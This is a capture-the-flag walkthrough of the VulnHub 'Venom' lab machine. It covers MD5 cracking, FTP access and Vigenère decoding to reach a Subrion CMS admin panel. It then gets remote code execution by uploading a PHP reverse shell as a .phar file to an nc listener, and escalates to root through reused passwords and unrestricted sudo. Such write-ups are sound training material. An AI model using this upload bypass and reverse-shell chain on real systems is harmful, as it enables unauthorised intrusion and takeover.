Venom (VulnHub – Easy)

Venom is a multi‑stage machine that begins with credential recovery from an MD5 hash, pivots through FTP, and reveals a Vigenère‑encoded password for a Subrion CMS admin account. A file upload vulnerability in Subrion provides RCE, followed by lateral movement through multiple users and a final privilege escalation via unrestricted sudo.

Overview

Target: 10.10.10.15 Initial vector: MD5 hash → FTP → Vigenère decode → Subrion CMS admin Exploitation: upload .phar reverse shell Privilege escalation: user chaining → sudo bash

Enumeration

Initial web inspection reveals an MD5 hash in the page source:

5f2a66f947fa5690c26506f66bde5c23

Crack it:

$ hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
-> hostinger

FTP Access

$ ftp 10.10.10.15
Name: hostinger
Password: hostinger

Inside FTP:

• hint.txt
• mentions user dora
• mentions domain venom.box
• contains a Base64‑encoded Vigenère cipher

Decoding the Administrator Password

Decode the multi‑layer Base64 string:

$ echo 'WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=' \
  | base64 -d | base64 -d | base64 -d
-> standard vigenere cipher

Decode the second Base64 string to get the cipher tool:

$ echo 'aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=' | base64 -d
-> https://cryptii.com/pipes/vigenere-cipher

Use key hostinger to decode:

L7f9l8@J#p%Ue+Q1234  -->  E7r9t8@Q#h%Hy+M1234

Accessing Subrion CMS

Add domain:

$ sudo sh -c 'echo "10.10.10.15 venom.box" >> /etc/hosts'

Visit:

http://venom.box
-> Subrion CMS 4.2

Admin login:

http://venom.box/panel
dora : E7r9t8@Q#h%Hy+M1234

Upload directory:

http://venom.box/panel/uploads

Exploitation – Subrion File Upload RCE

Exploit 49876 attempts to upload a .phar file. Subrion blocks .php but allows .phar, which PHP still executes.

Create a reverse shell:

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.phar

Listener:

$ nc -nlvp 443

Upload shell.phar and trigger it:

http://venom.box/panel/uploads/shell.phar

Shell obtained as www-data.

Lateral Movement

1. Switch to hostinger

$ su hostinger
Password: hostinger

Enumerate user files:

/var/www/html/subrion/backup/.htaccess

Inside is a password for nathan:

FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

2. Switch to nathan

$ su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

User nathan shell obtained.

Privilege Escalation

Check sudo:

$ sudo -l
-> (root) NOPASSWD: ALL

Root:

$ sudo bash
# whoami
root

Conclusion

Venom is a layered machine: MD5 cracking → FTP hints → Vigenère decoding → Subrion CMS admin → .phar RCE → user chaining → sudo root. It’s a fun example of how multiple weak points combine into a full system compromise.